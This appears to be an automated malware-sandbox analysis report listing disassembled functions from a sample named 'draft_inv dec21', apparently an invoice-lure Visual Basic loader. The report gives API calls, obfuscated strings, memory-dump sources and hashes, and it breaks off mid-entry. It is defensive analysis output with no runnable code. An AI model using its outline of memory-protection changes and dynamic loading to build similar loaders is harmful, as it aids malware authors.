Function 0243069C, Relevance: 9.8, APIs: 1, Strings: 4, Instructions: 1025
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`7v, xrefs: 0242B031
$V, xrefs: 0242A8F7
;D'T, xrefs: 0242B0F4
ln[, xrefs: 0242B0DF

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: ;D'T$`7v$$V$ln[
API String ID: 0-2775860289
Opcode ID: b36bbf1aa64877bb5c23577a518187ff37320131a9fc50ad47009c2eda699a88
Instruction ID: 4b04c2c28f7e839eab8a6e7d3cdc413484c63f3a741ee9aed1493a77ad681a3d
Opcode Fuzzy Hash: b36bbf1aa64877bb5c23577a518187ff37320131a9fc50ad47009c2eda699a88
Instruction Fuzzy Hash: 8582547160431A9FDB349E39C9903EE77A2FF55390F95812EDC8A9B244D33589CACB42

Uniqueness

Uniqueness Score: -1.00%

Function 02432CD7, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 024334D0

Strings

&, xrefs: 0242F732
_'R, xrefs: 0243318E
P4, xrefs: 0242F723

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID: &$P4$_'R
API String ID: 2335996259-2337541554
Opcode ID: 6106d67efb594b7a604a72cfe7891c8d2265adbebc5a4dfe061ef2c5fc6ed417
Instruction ID: 37f0c98946076936f2cf242fec11c743fc08a83975db40a7081116a63344703f
Opcode Fuzzy Hash: 6106d67efb594b7a604a72cfe7891c8d2265adbebc5a4dfe061ef2c5fc6ed417
Instruction Fuzzy Hash: EFE1AB716043598FDF36DE3989947DA37A2EF4A390F99416BCC4E8B215D730C586CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02430A65, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n{NU, xrefs: 02430C20, 02430D3B, 02431112, 02431129
&, xrefs: 0242F732
P4, xrefs: 0242F723

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: &$P4$n{NU
API String ID: 0-336029330
Opcode ID: b157f13912548742f36f0863083e06f59596643c4869d441c9b0d6a291d7c605
Instruction ID: 61c3501aba79fe76be119e6aa28e4074b9466b541608b85846d60d02143bceab
Opcode Fuzzy Hash: b157f13912548742f36f0863083e06f59596643c4869d441c9b0d6a291d7c605
Instruction Fuzzy Hash: 6FD1687460074A9FDB35DE29CDA47EB37B2AF99380F94822ECC4E8B644D7358586CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0242FFE4, Relevance: 6.3, Strings: 5, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`7v, xrefs: 0242B031
&, xrefs: 0242F732
;D'T, xrefs: 0242B0F4
P4, xrefs: 0242F723
ln[, xrefs: 0242B0DF

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: &$;D'T$P4$`7v$ln[
API String ID: 0-3553131344
Opcode ID: cbf7f24f0f6e7ca0aa0c2428da77671c79af12cc99fd2af05fba212b433ea335
Instruction ID: 7ebf13cbb8bf47ef7e23fa6202db0574bc187d4e886e2460c9bdf93498d2d1dc
Opcode Fuzzy Hash: cbf7f24f0f6e7ca0aa0c2428da77671c79af12cc99fd2af05fba212b433ea335
Instruction Fuzzy Hash: 0921CA31604244CFCB7ACE10D9F4BEE33A6AF18350FA4416EDC498B211D7349A84CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0243265F, Relevance: 1.5, APIs: 1, Instructions: 37
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 02432717

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: b08a1b97e18eb127c992e764dd64eca91be400b1f9e9c36a269b75dac180efbc
Instruction ID: 4564bcdf07051660731aba6895885ce6fc1dfcf469e4d1e675faf501e9d613ef
Opcode Fuzzy Hash: b08a1b97e18eb127c992e764dd64eca91be400b1f9e9c36a269b75dac180efbc
Instruction Fuzzy Hash: D2018175600284DFDB64CF18DC546EAB7A6AFD8710F59802EDC89AB304DA705E42DB15

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4B0, Relevance: 503.8, APIs: 251, Strings: 36, Instructions: 1528
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaAryConstruct2.MSVBVM60(?,00403268,00000011), ref: 0041B587
__vbaAryConstruct2.MSVBVM60(?,00403284,00000011), ref: 0041B594
#614.MSVBVM60(00000000,4069E000), ref: 0041B59C
__vbaFpR8.MSVBVM60 ref: 0041B5A2
#613.MSVBVM60(?,?), ref: 0041B5DB
__vbaStrVarMove.MSVBVM60(?), ref: 0041B5E8
__vbaStrMove.MSVBVM60 ref: 0041B5F9
__vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 0041B60B
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041B637
__vbaStrMove.MSVBVM60 ref: 0041B642
__vbaFreeVar.MSVBVM60 ref: 0041B64A
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000), ref: 0041B665
__vbaObjVar.MSVBVM60(?), ref: 0041B672
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0041B67D
__vbaFreeVar.MSVBVM60 ref: 0041B689
#692.MSVBVM60(?,Dublers1,BOLIGFORENINGERNES), ref: 0041B6A0
__vbaLateMemCallLd.MSVBVM60(?,?,FileExists,00000001), ref: 0041B6F4
__vbaVarTstLt.MSVBVM60(00008002,00000000), ref: 0041B705
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041B722
#546.MSVBVM60(?), ref: 0041B73B
__vbaVarMove.MSVBVM60 ref: 0041B74D
#611.MSVBVM60 ref: 0041B753
__vbaStrMove.MSVBVM60 ref: 0041B75E
__vbaUI1I2.MSVBVM60 ref: 0041B76B
__vbaUI1I2.MSVBVM60 ref: 0041B777
__vbaUI1I2.MSVBVM60 ref: 0041B784
__vbaUI1I2.MSVBVM60 ref: 0041B791
__vbaUI1I2.MSVBVM60 ref: 0041B79E
__vbaUI1I2.MSVBVM60 ref: 0041B7AB
__vbaUI1I2.MSVBVM60 ref: 0041B7B8
__vbaUI1I2.MSVBVM60 ref: 0041B7C5
__vbaUI1I2.MSVBVM60 ref: 0041B7D2
__vbaUI1I2.MSVBVM60 ref: 0041B7DF
__vbaUI1I2.MSVBVM60 ref: 0041B7EC
__vbaUI1I2.MSVBVM60 ref: 0041B7F9
__vbaUI1I2.MSVBVM60 ref: 0041B806
__vbaUI1I2.MSVBVM60 ref: 0041B813
__vbaUI1I2.MSVBVM60 ref: 0041B820
__vbaUI1I2.MSVBVM60 ref: 0041B82D
__vbaUI1I2.MSVBVM60 ref: 0041B83A
__vbaUI1I2.MSVBVM60 ref: 0041B847
__vbaUI1I2.MSVBVM60 ref: 0041B854
__vbaUI1I2.MSVBVM60 ref: 0041B861
__vbaUI1I2.MSVBVM60 ref: 0041B86E
__vbaUI1I2.MSVBVM60 ref: 0041B87B
__vbaUI1I2.MSVBVM60 ref: 0041B888
__vbaUI1I2.MSVBVM60 ref: 0041B895
__vbaUI1I2.MSVBVM60 ref: 0041B8A2
__vbaUI1I2.MSVBVM60 ref: 0041B8AF
__vbaUI1I2.MSVBVM60 ref: 0041B8BC
__vbaUI1I2.MSVBVM60 ref: 0041B8C9
__vbaUI1I2.MSVBVM60 ref: 0041B8D6
#521.MSVBVM60(CHLORINES), ref: 0041B8E3
#560.MSVBVM60(?), ref: 0041B900
__vbaFreeVar.MSVBVM60 ref: 0041B919
#697.MSVBVM60(00003CBD), ref: 0041B92D
__vbaStrMove.MSVBVM60 ref: 0041B938
__vbaNew2.MSVBVM60(0040304C,0041F49C), ref: 0041B94D
__vbaHresultCheckObj.MSVBVM60(00000000,0227EA7C,0040303C,00000014), ref: 0041B975
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040305C,000000B8), ref: 0041B9A5
__vbaFreeObj.MSVBVM60 ref: 0041B9B1
__vbaStrToAnsi.MSVBVM60(?,Bronkiernes,0015A669,?), ref: 0041B9D9
__vbaSetSystemError.MSVBVM60(00818715,00000000), ref: 0041B9F0
__vbaFreeStr.MSVBVM60 ref: 0041BA12
__vbaUbound.MSVBVM60(00000001,?), ref: 0041BA27
__vbaGenerateBoundsError.MSVBVM60 ref: 0041BA4C
__vbaUI1I4.MSVBVM60 ref: 0041BA67
__vbaVarDup.MSVBVM60 ref: 0041BAA5
#619.MSVBVM60(?,00000008,000000CB), ref: 0041BABE
__vbaStrVarMove.MSVBVM60(?), ref: 0041BACB
__vbaStrMove.MSVBVM60 ref: 0041BAD6
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041BAE8
#628.MSVBVM60(SCOURING,000000C5,00000008), ref: 0041BB16
__vbaStrMove.MSVBVM60 ref: 0041BB24
__vbaVarDup.MSVBVM60 ref: 0041BB46
#518.MSVBVM60(?,?), ref: 0041BB5A
__vbaStrVarVal.MSVBVM60(?,?), ref: 0041BB84
#581.MSVBVM60(00000000), ref: 0041BB87
__vbaFpI4.MSVBVM60 ref: 0041BB8D
__vbaStrMove.MSVBVM60(00000000), ref: 0041BB9C
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041BBAA
__vbaSetSystemError.MSVBVM60(0088DCA8,00480EF5,00000000), ref: 0041BBC6
#685.MSVBVM60 ref: 0041BBCC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BBDA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030E0,0000001C), ref: 0041BBFE
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0041BC3E
__vbaFreeObj.MSVBVM60 ref: 0041BC4D
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,?), ref: 0041BC70
__vbaStrCopy.MSVBVM60 ref: 0041BC8B
__vbaVarDup.MSVBVM60 ref: 0041BCB1
#522.MSVBVM60(?,00000002), ref: 0041BCC5
#573.MSVBVM60(?,?), ref: 0041BCED
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000), ref: 0041BD07
__vbaStrVarVal.MSVBVM60(?,?,00000000), ref: 0041BD18
#712.MSVBVM60(?,00000000), ref: 0041BD1F
__vbaStrMove.MSVBVM60 ref: 0041BD30
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BD42
__vbaFreeVarList.MSVBVM60(00000004,00000002,00000002,?,?), ref: 0041BD66
#717.MSVBVM60(00000002,00000008,00000040,00000000), ref: 0041BD90
__vbaStrVarMove.MSVBVM60(00000002), ref: 0041BD9D
__vbaStrMove.MSVBVM60 ref: 0041BDA8
__vbaFreeVar.MSVBVM60 ref: 0041BDB0
#714.MSVBVM60(?,00000008,00000000), ref: 0041BDE0
__vbaI4Var.MSVBVM60(?), ref: 0041BDED
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041BDFF
__vbaFPInt.MSVBVM60 ref: 0041BE17
__vbaFpR8.MSVBVM60 ref: 0041BE1D
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041BE49
#651.MSVBVM60(00000004,?), ref: 0041BE7C
__vbaStrMove.MSVBVM60 ref: 0041BE8A
__vbaStrCat.MSVBVM60(00000000), ref: 0041BE93
__vbaStrMove.MSVBVM60 ref: 0041BE9D
__vbaStrCat.MSVBVM60(Udstykningskontrollerne,00000000), ref: 0041BEA5
__vbaStrMove.MSVBVM60 ref: 0041BEAC
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BEBE
__vbaFreeVar.MSVBVM60 ref: 0041BECD
__vbaNew2.MSVBVM60(0040304C,0041F49C), ref: 0041BEE6
__vbaHresultCheckObj.MSVBVM60(00000000,0227EA7C,0040303C,00000014), ref: 0041BF0E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040305C,000000F0), ref: 0041BF3E
__vbaStrMove.MSVBVM60 ref: 0041BF57
__vbaFreeObj.MSVBVM60 ref: 0041BF5F
__vbaR8IntI4.MSVBVM60 ref: 0041BF6B
#696.MSVBVM60(BUGTERS), ref: 0041BFAA
__vbaVarDup.MSVBVM60 ref: 0041BFE8
#528.MSVBVM60(?,00000004), ref: 0041BFFC
__vbaStrVarMove.MSVBVM60(?), ref: 0041C009
__vbaStrMove.MSVBVM60 ref: 0041C017
#696.MSVBVM60(amoebae), ref: 0041C026
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402AF0,000006F8), ref: 0041C04D
__vbaFreeStr.MSVBVM60 ref: 0041C059
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041C06F
#587.MSVBVM60(60000000,4160A08A), ref: 0041C082
#564.MSVBVM60(00000004,?), ref: 0041C0BE
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041C0C9
#685.MSVBVM60 ref: 0041C0CF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C0DD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030E0,0000001C), ref: 0041C101
__vbaI4Var.MSVBVM60(?,0000635F,?,?,Plaiderne), ref: 0041C13E
__vbaFreeObj.MSVBVM60 ref: 0041C152
__vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 0041C168
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402AF0,000006FC), ref: 0041C18A
__vbaStrCopy.MSVBVM60 ref: 0041C19B
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402AF0,00000700), ref: 0041C1C6
__vbaFreeStr.MSVBVM60 ref: 0041C1D8
__vbaVarDup.MSVBVM60 ref: 0041C203
#607.MSVBVM60(?,0000004C,00000005), ref: 0041C219
#696.MSVBVM60(Necromancy7), ref: 0041C224
__vbaStrVarMove.MSVBVM60(?), ref: 0041C237
__vbaStrMove.MSVBVM60 ref: 0041C245
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402AF0,00000704), ref: 0041C27A
__vbaFreeStr.MSVBVM60 ref: 0041C286
__vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 0041C298
__vbaStrCopy.MSVBVM60 ref: 0041C2C0
__vbaR8IntI4.MSVBVM60(?,00000D7A,00000445,Foresettled6,000FAB14), ref: 0041C2ED
__vbaFreeStr.MSVBVM60 ref: 0041C301
#648.MSVBVM60(00000005), ref: 0041C31E
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402AF0,00000708), ref: 0041C360
__vbaFreeVar.MSVBVM60 ref: 0041C36C
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402AF0,0000070C), ref: 0041C392
__vbaFreeStr.MSVBVM60(0041C4B9), ref: 0041C443
__vbaAryDestruct.MSVBVM60(00000000,000FAB14), ref: 0041C45D
__vbaFreeObj.MSVBVM60 ref: 0041C462
__vbaFreeStr.MSVBVM60 ref: 0041C46B

Strings

G, xrefs: 0041BB02
9-9-9, xrefs: 0041C918
SKROFULOSES, xrefs: 0041BFD4
Ekstrovert2, xrefs: 0041BC9D
Necromancy7, xrefs: 0041C21F
Chefsassistenten1, xrefs: 0041C7B3
nitiden, xrefs: 0041C774
Inddatafunktionens9, xrefs: 0041BC83
Afbrydningerne, xrefs: 0041C976
Plaiderne, xrefs: 0041C10F
Unhazarded, xrefs: 0041C951
BUGTERS, xrefs: 0041BFA5
Uopfyldte, xrefs: 0041CAA6
Dublers1, xrefs: 0041B694
amoebae, xrefs: 0041C01B
autostyly, xrefs: 0041BA91
Xanthophyllite, xrefs: 0041CB3B
Supralapsarianism, xrefs: 0041BB32
Alvorlighedens, xrefs: 0041CAE0
outrace, xrefs: 0041CB40
Stuepiges, xrefs: 0041C190
COMPENDENCY, xrefs: 0041C32D
I, xrefs: 0041C12A
Contracter, xrefs: 0041C670
BOLIGFORENINGERNES, xrefs: 0041B68F
CHLORINES, xrefs: 0041B8DB
_c, xrefs: 0041BF8F
6IE, xrefs: 0041B9FE
antihemophilic, xrefs: 0041CA7F
Foresettled6, xrefs: 0041C2D5
SCOURING, xrefs: 0041BAFD
Bronkiernes, xrefs: 0041B9C3
Udstykningskontrollerne, xrefs: 0041BEA0
FileExists, xrefs: 0041B6D3
Tracheotomist3, xrefs: 0041C2A1
Scripting.FileSystemObject, xrefs: 0041B659

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$Move$CheckHresult$List$Error$#696CopySystem$#685AnsiConstruct2New2$#518#521#522#528#546#560#564#573#581#587#607#611#613#614#619#628#648#651#692#697#702#712#714#716#717AddrefBoundsCallDestructGenerateLateUbound
String ID: 6IE$9-9-9$Afbrydningerne$Alvorlighedens$BOLIGFORENINGERNES$BUGTERS$Bronkiernes$CHLORINES$COMPENDENCY$Chefsassistenten1$Contracter$Dublers1$Ekstrovert2$FileExists$Foresettled6$G$Inddatafunktionens9$Necromancy7$Plaiderne$SCOURING$SKROFULOSES$Scripting.FileSystemObject$Stuepiges$Supralapsarianism$Tracheotomist3$Udstykningskontrollerne$Unhazarded$Uopfyldte$Xanthophyllite$_c$amoebae$antihemophilic$autostyly$nitiden$outrace$I
API String ID: 3093002383-3581254469
Opcode ID: 1a49e9c186b717d1112410183b643f0d4131f5e053ccb7ac6f9b77ae23b22e62
Instruction ID: fbc5245dd3baa99f63f311b358571568d74894abc98dca8b60964b0a1439cb1a
Opcode Fuzzy Hash: 1a49e9c186b717d1112410183b643f0d4131f5e053ccb7ac6f9b77ae23b22e62
Instruction Fuzzy Hash: 77D250719002199FDB14DFA4DD84BDEBBB8FF48700F1081AAE60AB7291DB745A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE60, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#598.MSVBVM60 ref: 0041CEAF
__vbaStrCopy.MSVBVM60 ref: 0041CEBD
#523.MSVBVM60(?), ref: 0041CEC7
__vbaStrMove.MSVBVM60 ref: 0041CED8
__vbaStrCmp.MSVBVM60(informeret,00000000), ref: 0041CEE0
__vbaFreeStr.MSVBVM60 ref: 0041CEF3
#525.MSVBVM60(000000BB), ref: 0041CF07
__vbaStrMove.MSVBVM60 ref: 0041CF12
__vbaStrMove.MSVBVM60(000000B4,?), ref: 0041CF34
#628.MSVBVM60(00000000), ref: 0041CF37
__vbaStrMove.MSVBVM60 ref: 0041CF42
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CF4E
__vbaFreeVar.MSVBVM60 ref: 0041CF5A
#514.MSVBVM60(WATERISHLY,00000080), ref: 0041CF6A
__vbaStrMove.MSVBVM60 ref: 0041CF75
#712.MSVBVM60(?,Amboinas,knallertbanes,00000001,000000FF,00000000), ref: 0041CF8A
__vbaStrMove.MSVBVM60 ref: 0041CF95
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000), ref: 0041CFA1
__vbaObjVar.MSVBVM60(?), ref: 0041CFAB
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0041CFB6
__vbaFreeVar.MSVBVM60 ref: 0041CFBF
#521.MSVBVM60(Glosse5), ref: 0041CFCA
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041D00E
__vbaVarTstLt.MSVBVM60(00008002,00000000), ref: 0041D01C
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041D02F
__vbaNew2.MSVBVM60(0040304C,0041F49C), ref: 0041D04F
__vbaHresultCheckObj.MSVBVM60(00000000,0227EA7C,0040303C,0000004C), ref: 0041D074
__vbaHresultCheckObj.MSVBVM60(00000000,?,004034C8,00000028), ref: 0041D094
__vbaFreeObj.MSVBVM60 ref: 0041D09D
__vbaFreeStr.MSVBVM60(0041D102), ref: 0041D0EC
__vbaFreeObj.MSVBVM60 ref: 0041D0F1
__vbaFreeStr.MSVBVM60 ref: 0041D0FA
__vbaFreeStr.MSVBVM60 ref: 0041D0FF

Strings

Glosse5, xrefs: 0041CFC5
Amboinas, xrefs: 0041CF84
knallertbanes, xrefs: 0041CF7F
informeret, xrefs: 0041CEDB
FolderExists, xrefs: 0041CFF3
WATERISHLY, xrefs: 0041CF65
Kumulatives4, xrefs: 0041CEB5
Scripting.FileSystemObject, xrefs: 0041CF98

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$Move$CheckHresultList$#514#521#523#525#598#628#712#716AddrefCallCopyLateNew2
String ID: Amboinas$FolderExists$Glosse5$Kumulatives4$Scripting.FileSystemObject$WATERISHLY$informeret$knallertbanes
API String ID: 1506482490-314412841
Opcode ID: 156f07288ea05aedafc705d63f8adf25faece7a357f3c43ed58453b45a7a58d9
Instruction ID: 76b354d46ffea17d5b45e4fca0132372d857c35e1c00ea78c16e15ab4c22b2d8
Opcode Fuzzy Hash: 156f07288ea05aedafc705d63f8adf25faece7a357f3c43ed58453b45a7a58d9
Instruction Fuzzy Hash: 03711EB1D00219DBCB14DFA4DD89AEEBFB8FB48705F10812AE506B72A0DB745949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0242C20C, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 715COMMON

Download Yara Rule

Strings

", xrefs: 0242C39B
&, xrefs: 0242F732
P4, xrefs: 0242F723

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: &$P4$"
API String ID: 0-1063255473
Opcode ID: 257cd24869cf9a06012983dc36a9cd08e61cd7c4c78c4e8775d44b4b50cb416e
Instruction ID: f475f7e3d033a54f33923e77cfdd65223bbbb008962683d91a82c234bda10c17
Opcode Fuzzy Hash: 257cd24869cf9a06012983dc36a9cd08e61cd7c4c78c4e8775d44b4b50cb416e
Instruction Fuzzy Hash: F1321A3290C6A5DFCB31DE215186E853B60EB5B7647CD01BD89168F811EA60B2BFC7D2

Uniqueness

Uniqueness Score: -1.00%

Function 0243137E, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&, xrefs: 0242F732
}&, xrefs: 0243142B
P4, xrefs: 0242F723

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: &$P4$}&
API String ID: 0-700485630
Opcode ID: d17524cfb5dc56a714e4dcd66a2ab604a59afd9e5e586a57cd4a385db7b7acba
Instruction ID: b7431e3fa4622a5365455048813b25ed7e637970a6132921c40b531874be306e
Opcode Fuzzy Hash: d17524cfb5dc56a714e4dcd66a2ab604a59afd9e5e586a57cd4a385db7b7acba
Instruction Fuzzy Hash: BA619B3560476A8FCF34DE298995BDA37B2EF563A0F99006ECC4D8B541D730958ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 0242F3A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&, xrefs: 0242F732
P4, xrefs: 0242F723

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: &$P4
API String ID: 0-5662755
Opcode ID: 09085c64ee44c29399eb97885728bf000baa401e47824e8ef826ef317942f6eb
Instruction ID: 06564f8989b9ac798cf82ef46914cfd60d79870b65a37cc57e0dd7f49ec5d9a9
Opcode Fuzzy Hash: 09085c64ee44c29399eb97885728bf000baa401e47824e8ef826ef317942f6eb
Instruction Fuzzy Hash: 5E6159756046AA9FCF34CE15D895BDA37B1AF453A0FD8002EDC4E8BA41DB70958ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 0242F681, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(0C1144F9), ref: 0242F774

Strings

&, xrefs: 0242F732
P4, xrefs: 0242F723

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: &$P4
API String ID: 1029625771-5662755
Opcode ID: eef8045676fe41cbeb769b62a3785767f6a0b7a2de711f33a60b26e99e6772c0
Instruction ID: 364171d1748f234531dc6043ed9d8c34b46130844bdf3a0c85e344bca61825db
Opcode Fuzzy Hash: eef8045676fe41cbeb769b62a3785767f6a0b7a2de711f33a60b26e99e6772c0
Instruction Fuzzy Hash: 5201B578700B5AAEDF349E25DC84BEE37B29F95390FC5012E9C4D9B640DB358689CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00401668, Relevance: 1.8, APIs: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(00402250), ref: 0040166D

Memory Dump Source

Source File: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: 1438cf99327dbf82d35e965487db4d2664d7c7ce478205cd07bfc82945c57731
Instruction ID: 8bb3f9d3f775942b6a279bc0870e27c90db382770e8ec0ccf3a55d9497d606dc
Opcode Fuzzy Hash: 1438cf99327dbf82d35e965487db4d2664d7c7ce478205cd07bfc82945c57731
Instruction Fuzzy Hash: 3451436154E7C28FC7038B7488695517FB0AE5721971E84EBC4C1DF4B3E22D4D4ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 0242C6F8, Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,8B831894), ref: 0242C8D5

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 321f11af902be5fcb5bbf4db1900640388588161fe99d4fd523a762885587b32
Instruction ID: ef7aa05eabc21227b3380805d86c876ad01edd8906b29342a6ee554e5836f610
Opcode Fuzzy Hash: 321f11af902be5fcb5bbf4db1900640388588161fe99d4fd523a762885587b32
Instruction Fuzzy Hash: EF21E1745043069BEB286E34C5A67FFB7A3EFA13A0F96842F8CC356414D735498A8B07

Uniqueness

Uniqueness Score: -1.00%

Function 02423B5B, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE ref: 0242C4B7

Memory Dump Source

